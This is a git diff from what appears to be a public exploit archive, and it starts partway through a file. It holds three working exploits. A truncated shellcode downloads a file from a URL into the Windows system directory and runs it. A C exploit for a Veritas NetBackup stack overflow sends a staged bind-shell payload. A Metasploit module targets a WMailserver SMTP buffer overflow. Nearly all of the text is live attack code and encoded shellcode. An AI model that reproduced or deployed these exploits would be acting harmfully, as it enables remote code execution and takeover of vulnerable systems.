+
+   for (k=0;k0; i--)
+   {
+       l = 0;
+       for(j=DECODE_LEN; j ebx)
+       dec     ebx
+       xor     ecx,ecx
+       mov     cl,0xFF                     // Decode len
+
+   decode_loop:
+       xor     byte ptr [ebx+ecx],ENC_KEY     // Decode key
+       loop    decode_loop
+       jmp     short decode_ok
+
+decode_end:
+       call    decode_start
+
+decode_ok:
+
+//--------------------------------------------------------------------
+//
+// ShellCode
+//
+//--------------------------------------------------------------------
+       jmp     sc_end
+
+sc_start:
+       pop     edi                         // Hash string start addr (esp -> edi)
+
+       // Get kernel32.dll base addr
+       mov     eax, fs:0x30                // PEB
+       mov     eax, [eax+0x0c]             // PROCESS_MODULE_INFO
+       mov     esi, [eax+0x1c]             // InInitOrder.flink
+       lodsd                               // eax = InInitOrder.blink
+       mov     ebp, [eax+8]                // ebp = kernel32.dll base address
+
+       mov     esi, edi                    // Hash string start addr -> esi
+
+       // Get function addr of kernel32
+       push    4
+       pop     ecx
+
+   getkernel32:
+       call    GetProcAddress_fun
+       loop    getkernel32
+
+       // Get function addr of urlmon
+       push    0x00006e6f
+       push    0x6d6c7275                 // urlmon
+       push    esp
+       call    ADDR_LoadLibraryA          // LoadLibraryA("urlmon");
+
+       mov     ebp, eax                   // ebp = urlmon.dll base address
+
+/*
+       push    1
+       pop     ecx
+
+   geturlmon:
+       call    GetProcAddress_fun
+       loop    geturlmon
+*/
+       call    GetProcAddress_fun
+
+       // url start addr = edi
+
+LGetSystemDirectoryA:
+       sub     esp, 0x20
+       mov     ebx, esp
+
+       push    0x20
+       push    ebx
+      call   ADDR_GetSystemDirectoryA     // GetSystemDirectoryA
+
+LURLDownloadToFileA:
+       // eax = system path size
+       // URLDownloadToFileA url save to a.exe
+       mov     dword ptr [ebx+eax], 0x652E555C           // "\U.e"
+       mov     dword ptr [ebx+eax+0x4], 0x00006578       // "xe"
+       xor     eax, eax
+       push    eax
+       push    eax
+       push    ebx                         // %systemdir%\U.exe
+       push    edi                         // url
+       push    eax
+call    ADDR_URLDownloadToFileA     // URLDownloadToFileA
+
+//LWinExec:
+               mov     ebx, esp
+               push    1//executes in SW_SHOW, push 0 if you wanna in SW_HIDE..
+               push    ebx
+               call    ADDR_WinExec                // WinExec(%systemdir%\a.exe);
+
+Finished:
+       //push    1
+       call    ADDR_ExitProcess            // ExitProcess();
+
+GetProcAddress_fun:
+       push    ecx
+       push    esi
+
+       mov     esi, [ebp+0x3C]             // e_lfanew
+       mov     esi, [esi+ebp+0x78]         // ExportDirectory RVA
+       add     esi, ebp                    // rva2va
+       push    esi
+       mov     esi, [esi+0x20]              // AddressOfNames RVA
+       add     esi, ebp                    // rva2va
+       xor     ecx, ecx
+       dec     ecx
+
+   find_start:
+       inc     ecx
+       lodsd
+       add     eax, ebp
+       xor     ebx, ebx
+
+   hash_loop:
+       movsx   edx, byte ptr [eax]
+       cmp     dl, dh
+       jz      short find_addr
+       ror     ebx, HASH_KEY               // hash key
+       add     ebx, edx
+       inc     eax
+       jmp     short hash_loop
+
+   find_addr:
+       cmp     ebx, [edi]                  // compare to hash
+       jnz     short find_start
+       pop     esi                         // ExportDirectory
+       mov     ebx, [esi+0x24]             // AddressOfNameOrdinals RVA
+       add     ebx, ebp                    // rva2va
+       mov     cx, [ebx+ecx*2]             // FunctionOrdinal
+       mov     ebx, [esi+0x1C]             // AddressOfFunctions RVA
+       add     ebx, ebp                    // rva2va
+       mov     eax, [ebx+ecx*4]            // FunctionAddress RVA
+       add     eax, ebp                    // rva2va
+       stosd                               // function address save to [edi]
+
+       pop     esi
+       pop     ecx
+       ret
+
+sc_end:
+       call sc_start
+
+       PROC_END                            //C macro to end proc
+   }
+}
+
+// milw0rm.com [2006-01-15]
diff --git a/platforms/windows/remote/1421.cpp b/platforms/windows/remote/1421.cpp
index d6d55b62a..c216ef86d 100755
--- a/platforms/windows/remote/1421.cpp
+++ b/platforms/windows/remote/1421.cpp
@@ -1,249 +1,249 @@
-/*
-
-	DESCRIPTION
-
-	Veritas NetBackup Stack Overflow (tcp/13701)
-	"Volume Manager Daemon" Module
-
-	Advisories
-	http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
-	http://www.frsirt.com/english/advisories/2005/2349
-
-	USAGE
-
-	C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
-	Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
-	Sending first buffer.
-	Sending second buffer.
-
-	C:\NetBackup>nc 192.168.0.200 4444
-	Microsoft Windows 2000 [versie 5.00.2195]
-	(C) Copyright 1985-2000 Microsoft Corp.
-
-	C:\WINNT\system32>
-
-	INFORMATION
-
-	I wrote this just for educational purposes :).
-
-	Because the buffer is only very small, I had to write small shellcode.
-	The code is less than 100 bytes, and there are 6 bytes left. So there
-	is still space to improve it. The stack seems to be static, every run
-	at the exact same location.
-
-	I used the Import Address Table (that looks like this):
-
-	(taken from v5.1)
-	Import Address Table
-	00447230 (send)
-	00447234 (recv)
-	00447238 (accept)
-	00447240 (listen)
-	0044724C (connect)
-	00447268 (closesocket)
-	00447284 (bind)
-	00447288 (socket)
-
-	Using that shellcode I retrieve the "second" shellcode. This can be ANY
-	code, and ANY size. No limitations.
-
-	Tested on Windows 2000 Professional, Service Pack 4, Dutch.
-	Tested on Veritas NetBackup 4.5, 5.0, 5.1 with some Maintenance Packs.
-	(not all).
-
-	Enjoy.
-
-*/
-#include 
-#include 
-#pragma comment(lib,"ws2_32")
-
-DWORD WINAPI SendShellcode(LPVOID lpParam);
-int iLocalOpenPort;
-
-/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
-char szShellcode[] =
-	"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd2"
-	"\x4a\xe7\xed\x83\xeb\xfc\xe2\xf4\x2e\x20\x0c\xa0\x3a\xb3\x18\x12"
-	"\x2d\x2a\x6c\x81\xf6\x6e\x6c\xa8\xee\xc1\x9b\xe8\xaa\x4b\x08\x66"
-	"\x9d\x52\x6c\xb2\xf2\x4b\x0c\xa4\x59\x7e\x6c\xec\x3c\x7b\x27\x74"
-	"\x7e\xce\x27\x99\xd5\x8b\x2d\xe0\xd3\x88\x0c\x19\xe9\x1e\xc3\xc5"
-	"\xa7\xaf\x6c\xb2\xf6\x4b\x0c\x8b\x59\x46\xac\x66\x8d\x56\xe6\x06"
-	"\xd1\x66\x6c\x64\xbe\x6e\xfb\x8c\x11\x7b\x3c\x89\x59\x09\xd7\x66"
-	"\x92\x46\x6c\x9d\xce\xe7\x6c\xad\xda\x14\x8f\x63\x9c\x44\x0b\xbd"
-	"\x2d\x9c\x81\xbe\xb4\x22\xd4\xdf\xba\x3d\x94\xdf\x8d\x1e\x18\x3d"
-	"\xba\x81\x0a\x11\xe9\x1a\x18\x3b\x8d\xc3\x02\x8b\x53\xa7\xef\xef"
-	"\x87\x20\xe5\x12\x02\x22\x3e\xe4\x27\xe7\xb0\x12\x04\x19\xb4\xbe"
-	"\x81\x19\xa4\xbe\x91\x19\x18\x3d\xb4\x22\xf6\xb1\xb4\x19\x6e\x0c"
-	"\x47\x22\x43\xf7\xa2\x8d\xb0\x12\x04\x20\xf7\xbc\x87\xb5\x37\x85"
-	"\x76\xe7\xc9\x04\x85\xb5\x31\xbe\x87\xb5\x37\x85\x37\x03\x61\xa4"
-	"\x85\xb5\x31\xbd\x86\x1e\xb2\x12\x02\xd9\x8f\x0a\xab\x8c\x9e\xba"
-	"\x2d\x9c\xb2\x12\x02\x2c\x8d\x89\xb4\x22\x84\x80\x5b\xaf\x8d\xbd"
-	"\x8b\x63\x2b\x64\x35\x20\xa3\x64\x30\x7b\x27\x1e\x78\xb4\xa5\xc0"
-	"\x2c\x08\xcb\x7e\x5f\x30\xdf\x46\x79\xe1\x8f\x9f\x2c\xf9\xf1\x12"
-	"\xa7\x0e\x18\x3b\x89\x1d\xb5\xbc\x83\x1b\x8d\xec\x83\x1b\xb2\xbc"
-	"\x2d\x9a\x8f\x40\x0b\x4f\x29\xbe\x2d\x9c\x8d\x12\x2d\x7d\x18\x3d"
-	"\x59\x1d\x1b\x6e\x16\x2e\x18\x3b\x80\xb5\x37\x85\x22\xc0\xe3\xb2"
-	"\x81\xb5\x31\x12\x02\x4a\xe7\xed";
-
-char szBuffer[] =
-	// We cannot use this small part.
-	"a"
-	"AAAAAAAAAAAAAAAAAAAA"
-	"AAAAAAAAAAAAAAAAAAAA"
-	"AAAAAAAAAAAAAAAAAAAA"
-	"AAAAAAAAAAAAAAAAAAA"
-
-	// Since the buffer is so small, we even need a part of
-	// the SOCKADDR_IN structure. No problem.
-
-	// struct sockaddr_in {
-	"BB"					// sin_family
-	"BB"					// sin_port
-	"BBBB"					// in_addr
-	// "BBBBBBBB"			// sin_zero
-	// }
-
-	// 'START'
-
-	// Move the stackpointer. (0x0012F??? -> 0x0012F000)
-	"\xC1\xEC\x0C"			// SHR ESP, 0x0C
-	"\xC1\xE4\x0C"			// SHL ESP, 0x0C
-
-	// Call socket().
-	"\x33\xDB"				// XOR EBX, EBX
-	"\x53"					// PUSH EBX
-	"\x43"					// INC EBX
-	"\x53"					// PUSH EBX
-	"\x43"					// INC EBX
-	"\x53"					// PUSH EBX
-	"\xBB\x88\x72\x44\x00"	// MOV EBX, 447288 [socket()]
-	"\xFF\x13"				// JMP DWORD PTR [EBX]
-	"\x8B\xF8"				// MOV EDI, EAX
-	// [edi -> socket]
-
-	// Call connect().
-	"\x33\xDB"				// XOR EBX, EBX
-	"\xB3\x16"				// MOV BL, 16
-	"\x53"					// PUSH EBX
-	"\xBB\x60\xF3\x12\x00"	// MOV EBX, 12F360
-	"\x53"					// PUSH EBX
-	"\x57"					// PUSH EDI
-	"\xBB\x4C\x72\x44\x00"	// MOV EBX, 44724C [connect()]
-	"\xFF\x13"				// JMP DWORD PTR [EBX]
-
-	// We need space.
-	"\x8B\xD4"				// MOV EDX, ESP
-	"\x80\xC6\x01"			// ADD DH, 1
-
-	// Call recv().
-	"\x33\xDB"				// XOR EBX, EBX
-	"\x53"					// PUSH EBX
-	"\x43"					// INC EBX
-	"\xC1\xE3\x10"			// SHL EBX, 8 [1 -> 65536]
-	"\x53"					// PUSH EBX
-	"\x52"					// PUSH EDX
-	"\x57"					// PUSH EDI
-	"\xBB\x34\x72\x44\x00"	// MOV EBX, 447234 [recv()]
-	"\xFF\x13"				// JMP DWORD PTR [EBX]
-
-	// And again.
-	"\x8B\xD4"				// MOV EDX, ESP
-	"\x80\xC6\x01"			// ADD DH, 1
-
-	// Jump to our shellcode.
-	"\xFF\xE2"				// JMP EDX
-
-	"O"
-	"W"
-	"N"
-	"E"
-	"D"
-	"!"
-
-	"\x68\xF3\x12\x00"		// Here our code starts :).
-	"\x00\xF0\x12\x00";		// Just a random readable address.
-
-// This is the NOT-interesting part :).
-
-DWORD main(int argc, char *argv[]) {
-	printf("Veritas NetBackup v4/v5/v6 \"Volume Manager Daemon\" Stack Overflow.\n");
-
-	// We need a local port and ip because our first buffer is way too small
-	// to contain our complete shellcode. We use a small shellcode first to
-	// retrieve the second shellcode. The only method that fitted as first
-	// shellcode was a connect-back shellcode. For the second we got LOADS of
-	// space :).
-	if (argc<5) {
-		printf("Usage: %s    \n\n", argv[0]);
-		printf("Types (tested):\n");
-		printf(" 0 - NetBackup v5.0_1A\n");
-		printf("     NetBackup v5.0_2\n");
-		printf("     NetBackup v5.0_3\n");
-		printf("     NetBackup v5.1\n\n");
-		return NULL;
-	}
-
-	WSADATA wsa;
-	WSAStartup(MAKEWORD(2,0), &wsa);
-
-	sockaddr_in strTarget;
-	memset(&strTarget, 0, sizeof(strTarget));
-	strTarget.sin_addr.s_addr = inet_addr(argv[3]);
-	strTarget.sin_family = AF_INET;
-	strTarget.sin_port = htons(13701);
-
-	iLocalOpenPort = atoi(argv[2]);
-	HANDLE hStage2 = CreateThread(NULL, 0, SendShellcode, 0, 0, 0);
-
-	SOCKET sTarget = socket(AF_INET, SOCK_STREAM, 0);
-	int iResult = connect(sTarget, (struct sockaddr *)&strTarget, sizeof(strTarget));
-
-	if (iResult != SOCKET_ERROR) {
-		printf("Sending first buffer.\n");
-		// Fill in the structure.
-		unsigned long family = AF_INET;
-		memcpy(szBuffer + 80, &family, 2);
-		unsigned long port = htons(iLocalOpenPort);
-		memcpy(szBuffer + 82, &port, 2);
-		unsigned long ip = inet_addr(argv[1]);
-		memcpy(szBuffer + 84, &ip, 4);
-
-		send(sTarget, szBuffer, sizeof(szBuffer)-1, 0);
-		closesocket(sTarget);
-	}
-
-	WaitForSingleObject(hStage2, 3000);
-	WSACleanup();
-	return NULL;
-}
-
-DWORD WINAPI SendShellcode(LPVOID lpParam) {
-	SOCKET sTarget;
-	SOCKET sAccept;
-	struct hostent *hp;
-	struct sockaddr_in strTarget;
-	struct sockaddr_in strAccept;
-
-	int iStrSize = sizeof(strTarget);
-
-	memset(&strTarget, 0, sizeof(strTarget));
-	strTarget.sin_addr.s_addr = INADDR_ANY;
-	strTarget.sin_family = AF_INET;
-	strTarget.sin_port = htons(iLocalOpenPort);
-
-	sTarget = socket(AF_INET, SOCK_STREAM, 0);
-	bind(sTarget, (struct sockaddr *)&strTarget, iStrSize);
-	listen(sTarget, 2);
-	sAccept = accept(sTarget, (struct sockaddr *)&strAccept, &iStrSize);
-
-	if (sAccept != INVALID_SOCKET) {
-		printf("Sending second buffer.\n");
-		send(sAccept, szShellcode, sizeof(szShellcode) - 1, 0);
-		closesocket(sAccept);
-	}
-
-	return NULL;
-}
-
-// milw0rm.com [2006-01-16]
+/*
+
+	DESCRIPTION
+
+	Veritas NetBackup Stack Overflow (tcp/13701)
+	"Volume Manager Daemon" Module
+
+	Advisories
+	http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
+	http://www.frsirt.com/english/advisories/2005/2349
+
+	USAGE
+
+	C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
+	Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
+	Sending first buffer.
+	Sending second buffer.
+
+	C:\NetBackup>nc 192.168.0.200 4444
+	Microsoft Windows 2000 [versie 5.00.2195]
+	(C) Copyright 1985-2000 Microsoft Corp.
+
+	C:\WINNT\system32>
+
+	INFORMATION
+
+	I wrote this just for educational purposes :).
+
+	Because the buffer is only very small, I had to write small shellcode.
+	The code is less than 100 bytes, and there are 6 bytes left. So there
+	is still space to improve it. The stack seems to be static, every run
+	at the exact same location.
+
+	I used the Import Address Table (that looks like this):
+
+	(taken from v5.1)
+	Import Address Table
+	00447230 (send)
+	00447234 (recv)
+	00447238 (accept)
+	00447240 (listen)
+	0044724C (connect)
+	00447268 (closesocket)
+	00447284 (bind)
+	00447288 (socket)
+
+	Using that shellcode I retrieve the "second" shellcode. This can be ANY
+	code, and ANY size. No limitations.
+
+	Tested on Windows 2000 Professional, Service Pack 4, Dutch.
+	Tested on Veritas NetBackup 4.5, 5.0, 5.1 with some Maintenance Packs.
+	(not all).
+
+	Enjoy.
+
+*/
+#include 
+#include 
+#pragma comment(lib,"ws2_32")
+
+DWORD WINAPI SendShellcode(LPVOID lpParam);
+int iLocalOpenPort;
+
+/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
+char szShellcode[] =
+	"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd2"
+	"\x4a\xe7\xed\x83\xeb\xfc\xe2\xf4\x2e\x20\x0c\xa0\x3a\xb3\x18\x12"
+	"\x2d\x2a\x6c\x81\xf6\x6e\x6c\xa8\xee\xc1\x9b\xe8\xaa\x4b\x08\x66"
+	"\x9d\x52\x6c\xb2\xf2\x4b\x0c\xa4\x59\x7e\x6c\xec\x3c\x7b\x27\x74"
+	"\x7e\xce\x27\x99\xd5\x8b\x2d\xe0\xd3\x88\x0c\x19\xe9\x1e\xc3\xc5"
+	"\xa7\xaf\x6c\xb2\xf6\x4b\x0c\x8b\x59\x46\xac\x66\x8d\x56\xe6\x06"
+	"\xd1\x66\x6c\x64\xbe\x6e\xfb\x8c\x11\x7b\x3c\x89\x59\x09\xd7\x66"
+	"\x92\x46\x6c\x9d\xce\xe7\x6c\xad\xda\x14\x8f\x63\x9c\x44\x0b\xbd"
+	"\x2d\x9c\x81\xbe\xb4\x22\xd4\xdf\xba\x3d\x94\xdf\x8d\x1e\x18\x3d"
+	"\xba\x81\x0a\x11\xe9\x1a\x18\x3b\x8d\xc3\x02\x8b\x53\xa7\xef\xef"
+	"\x87\x20\xe5\x12\x02\x22\x3e\xe4\x27\xe7\xb0\x12\x04\x19\xb4\xbe"
+	"\x81\x19\xa4\xbe\x91\x19\x18\x3d\xb4\x22\xf6\xb1\xb4\x19\x6e\x0c"
+	"\x47\x22\x43\xf7\xa2\x8d\xb0\x12\x04\x20\xf7\xbc\x87\xb5\x37\x85"
+	"\x76\xe7\xc9\x04\x85\xb5\x31\xbe\x87\xb5\x37\x85\x37\x03\x61\xa4"
+	"\x85\xb5\x31\xbd\x86\x1e\xb2\x12\x02\xd9\x8f\x0a\xab\x8c\x9e\xba"
+	"\x2d\x9c\xb2\x12\x02\x2c\x8d\x89\xb4\x22\x84\x80\x5b\xaf\x8d\xbd"
+	"\x8b\x63\x2b\x64\x35\x20\xa3\x64\x30\x7b\x27\x1e\x78\xb4\xa5\xc0"
+	"\x2c\x08\xcb\x7e\x5f\x30\xdf\x46\x79\xe1\x8f\x9f\x2c\xf9\xf1\x12"
+	"\xa7\x0e\x18\x3b\x89\x1d\xb5\xbc\x83\x1b\x8d\xec\x83\x1b\xb2\xbc"
+	"\x2d\x9a\x8f\x40\x0b\x4f\x29\xbe\x2d\x9c\x8d\x12\x2d\x7d\x18\x3d"
+	"\x59\x1d\x1b\x6e\x16\x2e\x18\x3b\x80\xb5\x37\x85\x22\xc0\xe3\xb2"
+	"\x81\xb5\x31\x12\x02\x4a\xe7\xed";
+
+char szBuffer[] =
+	// We cannot use this small part.
+	"a"
+	"AAAAAAAAAAAAAAAAAAAA"
+	"AAAAAAAAAAAAAAAAAAAA"
+	"AAAAAAAAAAAAAAAAAAAA"
+	"AAAAAAAAAAAAAAAAAAA"
+
+	// Since the buffer is so small, we even need a part of
+	// the SOCKADDR_IN structure. No problem.
+
+	// struct sockaddr_in {
+	"BB"					// sin_family
+	"BB"					// sin_port
+	"BBBB"					// in_addr
+	// "BBBBBBBB"			// sin_zero
+	// }
+
+	// 'START'
+
+	// Move the stackpointer. (0x0012F??? -> 0x0012F000)
+	"\xC1\xEC\x0C"			// SHR ESP, 0x0C
+	"\xC1\xE4\x0C"			// SHL ESP, 0x0C
+
+	// Call socket().
+	"\x33\xDB"				// XOR EBX, EBX
+	"\x53"					// PUSH EBX
+	"\x43"					// INC EBX
+	"\x53"					// PUSH EBX
+	"\x43"					// INC EBX
+	"\x53"					// PUSH EBX
+	"\xBB\x88\x72\x44\x00"	// MOV EBX, 447288 [socket()]
+	"\xFF\x13"				// JMP DWORD PTR [EBX]
+	"\x8B\xF8"				// MOV EDI, EAX
+	// [edi -> socket]
+
+	// Call connect().
+	"\x33\xDB"				// XOR EBX, EBX
+	"\xB3\x16"				// MOV BL, 16
+	"\x53"					// PUSH EBX
+	"\xBB\x60\xF3\x12\x00"	// MOV EBX, 12F360
+	"\x53"					// PUSH EBX
+	"\x57"					// PUSH EDI
+	"\xBB\x4C\x72\x44\x00"	// MOV EBX, 44724C [connect()]
+	"\xFF\x13"				// JMP DWORD PTR [EBX]
+
+	// We need space.
+	"\x8B\xD4"				// MOV EDX, ESP
+	"\x80\xC6\x01"			// ADD DH, 1
+
+	// Call recv().
+	"\x33\xDB"				// XOR EBX, EBX
+	"\x53"					// PUSH EBX
+	"\x43"					// INC EBX
+	"\xC1\xE3\x10"			// SHL EBX, 8 [1 -> 65536]
+	"\x53"					// PUSH EBX
+	"\x52"					// PUSH EDX
+	"\x57"					// PUSH EDI
+	"\xBB\x34\x72\x44\x00"	// MOV EBX, 447234 [recv()]
+	"\xFF\x13"				// JMP DWORD PTR [EBX]
+
+	// And again.
+	"\x8B\xD4"				// MOV EDX, ESP
+	"\x80\xC6\x01"			// ADD DH, 1
+
+	// Jump to our shellcode.
+	"\xFF\xE2"				// JMP EDX
+
+	"O"
+	"W"
+	"N"
+	"E"
+	"D"
+	"!"
+
+	"\x68\xF3\x12\x00"		// Here our code starts :).
+	"\x00\xF0\x12\x00";		// Just a random readable address.
+
+// This is the NOT-interesting part :).
+
+DWORD main(int argc, char *argv[]) {
+	printf("Veritas NetBackup v4/v5/v6 \"Volume Manager Daemon\" Stack Overflow.\n");
+
+	// We need a local port and ip because our first buffer is way too small
+	// to contain our complete shellcode. We use a small shellcode first to
+	// retrieve the second shellcode. The only method that fitted as first
+	// shellcode was a connect-back shellcode. For the second we got LOADS of
+	// space :).
+	if (argc<5) {
+		printf("Usage: %s    \n\n", argv[0]);
+		printf("Types (tested):\n");
+		printf(" 0 - NetBackup v5.0_1A\n");
+		printf("     NetBackup v5.0_2\n");
+		printf("     NetBackup v5.0_3\n");
+		printf("     NetBackup v5.1\n\n");
+		return NULL;
+	}
+
+	WSADATA wsa;
+	WSAStartup(MAKEWORD(2,0), &wsa);
+
+	sockaddr_in strTarget;
+	memset(&strTarget, 0, sizeof(strTarget));
+	strTarget.sin_addr.s_addr = inet_addr(argv[3]);
+	strTarget.sin_family = AF_INET;
+	strTarget.sin_port = htons(13701);
+
+	iLocalOpenPort = atoi(argv[2]);
+	HANDLE hStage2 = CreateThread(NULL, 0, SendShellcode, 0, 0, 0);
+
+	SOCKET sTarget = socket(AF_INET, SOCK_STREAM, 0);
+	int iResult = connect(sTarget, (struct sockaddr *)&strTarget, sizeof(strTarget));
+
+	if (iResult != SOCKET_ERROR) {
+		printf("Sending first buffer.\n");
+		// Fill in the structure.
+		unsigned long family = AF_INET;
+		memcpy(szBuffer + 80, &family, 2);
+		unsigned long port = htons(iLocalOpenPort);
+		memcpy(szBuffer + 82, &port, 2);
+		unsigned long ip = inet_addr(argv[1]);
+		memcpy(szBuffer + 84, &ip, 4);
+
+		send(sTarget, szBuffer, sizeof(szBuffer)-1, 0);
+		closesocket(sTarget);
+	}
+
+	WaitForSingleObject(hStage2, 3000);
+	WSACleanup();
+	return NULL;
+}
+
+DWORD WINAPI SendShellcode(LPVOID lpParam) {
+	SOCKET sTarget;
+	SOCKET sAccept;
+	struct hostent *hp;
+	struct sockaddr_in strTarget;
+	struct sockaddr_in strAccept;
+
+	int iStrSize = sizeof(strTarget);
+
+	memset(&strTarget, 0, sizeof(strTarget));
+	strTarget.sin_addr.s_addr = INADDR_ANY;
+	strTarget.sin_family = AF_INET;
+	strTarget.sin_port = htons(iLocalOpenPort);
+
+	sTarget = socket(AF_INET, SOCK_STREAM, 0);
+	bind(sTarget, (struct sockaddr *)&strTarget, iStrSize);
+	listen(sTarget, 2);
+	sAccept = accept(sTarget, (struct sockaddr *)&strAccept, &iStrSize);
+
+	if (sAccept != INVALID_SOCKET) {
+		printf("Sending second buffer.\n");
+		send(sAccept, szShellcode, sizeof(szShellcode) - 1, 0);
+		closesocket(sAccept);
+	}
+
+	return NULL;
+}
+
+// milw0rm.com [2006-01-16]
diff --git a/platforms/windows/remote/1463.pm b/platforms/windows/remote/1463.pm
index 268c40c91..f8cbd1311 100755
--- a/platforms/windows/remote/1463.pm
+++ b/platforms/windows/remote/1463.pm
@@ -1,108 +1,107 @@
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::wmailserver_smtp;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-
-	'Name'     => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
-	'Version'  => '$Revision: 1.1 $',
-	'Authors'  => [ 'y0 [at] w00t-shell.net', ],
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp' ],
-	'Priv'  => 0,
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 25],
-		'SSL'   => [0, 'BOOL', 'Use SSL'],
-	  },
-	'AutoOpts' => { 'EXITFUNC' => 'thread' },
-	'Payload' =>
-	  {
-		'Space'     => 600,
-		'BadChars'  => "\x00\x0a\x0d\x20:=+\x22",
-		'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
-		'Keys'      => ['+ws2ord'],
-	  },
-
-	'Description'  => Pex::Text::Freeform(qq{
-	This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
-	via a SEH frame overwrite.
-}),
-
-	'Refs'  =>
-	  [
-		['CVE', 'CAN-2005-2287'],
-		['BID', '14213'],
-	  ],
-	'Targets' =>
-	  [
-		['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
-		['Windows 2000 English ALL', 0x75022ac4],
-		['Windows XP English SP0/SP1', 0x71aa32ad],
-	  ],
-	'Keys' => ['smtp'],
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit
-{
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target = $self->Targets->[$target_idx];
-
-	if (! $self->InitNops(128)) {
-		$self->PrintLine("[*] Failed to initialize the nop module.");
-		return;
-	}
-
-	my $splat  = Pex::Text::UpperCaseText(5117);
-
-	my $sploit =
-	  " ". $splat. "\xeb\x06". pack('V', $target->[1]).
-	  $shellcode. "\r\n\r\n";
-
-	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	$s->Send($sploit);
-	$self->Handler($s);
-	$s->Close();
-	return;
-}
-
-1;
-
-# milw0rm.com [2006-02-01]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::wmailserver_smtp;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+
+	'Name'     => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
+	'Version'  => '$Revision: 1.1 $',
+	'Authors'  => [ 'y0 [at] w00t-shell.net', ],
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp' ],
+	'Priv'  => 0,
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 25],
+		'SSL'   => [0, 'BOOL', 'Use SSL'],
+	  },
+	'AutoOpts' => { 'EXITFUNC' => 'thread' },
+	'Payload' =>
+	  {
+		'Space'     => 600,
+		'BadChars'  => "\x00\x0a\x0d\x20:=+\x22",
+		'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
+		'Keys'      => ['+ws2ord'],
+	  },
+
+	'Description'  => Pex::Text::Freeform(qq{
+	This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
+	via a SEH frame overwrite.
+}),
+
+	'Refs'  =>
+	  [
+		['CVE', 'CAN-2005-2287'],
+		['BID', '14213'],
+	  ],
+	'Targets' =>
+	  [
+		['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
+		['Windows 2000 English ALL', 0x75022ac4],
+		['Windows XP English SP0/SP1', 0x71aa32ad],
+	  ],
+	'Keys' => ['smtp'],
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit
+{
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target = $self->Targets->[$target_idx];
+
+	if (! $self->InitNops(128)) {
+		$self->PrintLine("[*] Failed to initialize the nop module.");
+		return;
+	}
+
+	my $splat  = Pex::Text::UpperCaseText(5117);
+
+	my $sploit =
+	  " ". $splat. "\xeb\x06". pack('V', $target->[1]).
+	  $shellcode. "\r\n\r\n";
+
+	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+
+	$s->Send($sploit);
+	$self->Handler($s);
+	$s->Close();
+	return;
+}
+
+1;
+
+# milw0rm.com [2006-02-01]
